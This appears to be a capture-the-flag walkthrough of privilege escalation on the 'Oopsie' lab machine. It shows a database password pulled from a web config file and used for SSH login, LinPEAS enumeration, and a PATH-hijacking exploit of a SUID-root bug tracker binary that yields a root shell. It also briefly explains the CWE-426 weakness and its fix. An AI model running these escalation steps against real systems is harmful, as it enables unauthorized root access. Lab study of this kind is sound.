3 box enum > privesc
cd /home
ls -la
ls -la
total 12
drwxr-xr-x 3 root root 4096 Jan 23 2020 .
drwxr-xr-x 24 root root 4096 Jan 27 2020 ..
drwxr-xr-x 7 robert robert 4096 Apr 24 21:48 robert
grep -rnw /var/www/html/ -e robert 2>/dev/null
./cdn-cgi/login/db.php:2:$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
$ ssh robert@10.10.10.28
robert@oopsie:~$ whoami
robert
robert@oopsie:~$ sudo -l
[sudo] password for robert:
Sorry, user robert may not run sudo on oopsie.
LinPEAS
-rwsr-xr-- 1 root bugtracker 8.6K Jan 25 2020 /usr/bin/bugtracker
--- Trying to execute /usr/bin/bugtracker with strace in order to look for hijackable libraries...
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
robert@oopsie:~$ /usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 10
---------------
cat: /root/reports/10: No such file or directory
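The SUID-root binary runs `cat` by bare name, without an absolute path, so the command is resolved through the caller-controlled `PATH` (an untrusted search path weakness, CWE-426). Calling the tool by absolute path, or setting a fixed `PATH` inside the binary, would close this.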
robert@oopsie:~$ cd /tmp
robert@oopsie:/tmp$ echo "/bin/bash" > cat
robert@oopsie:/tmp$ chmod +x cat
robert@oopsie:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
robert@oopsie:/tmp$ export PATH="/tmp:$PATH"
robert@oopsie:/tmp$ /usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 10
---------------
root@oopsie:/tmp# whoami
root
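Because `/tmp` is now first in `PATH`, `cat` in this shell resolves to the `/tmp/cat` wrapper instead of the real binary, so we cannot use `cat` to read files anymore: either use `more`, or remove the wrapper with `rm /tmp/cat`.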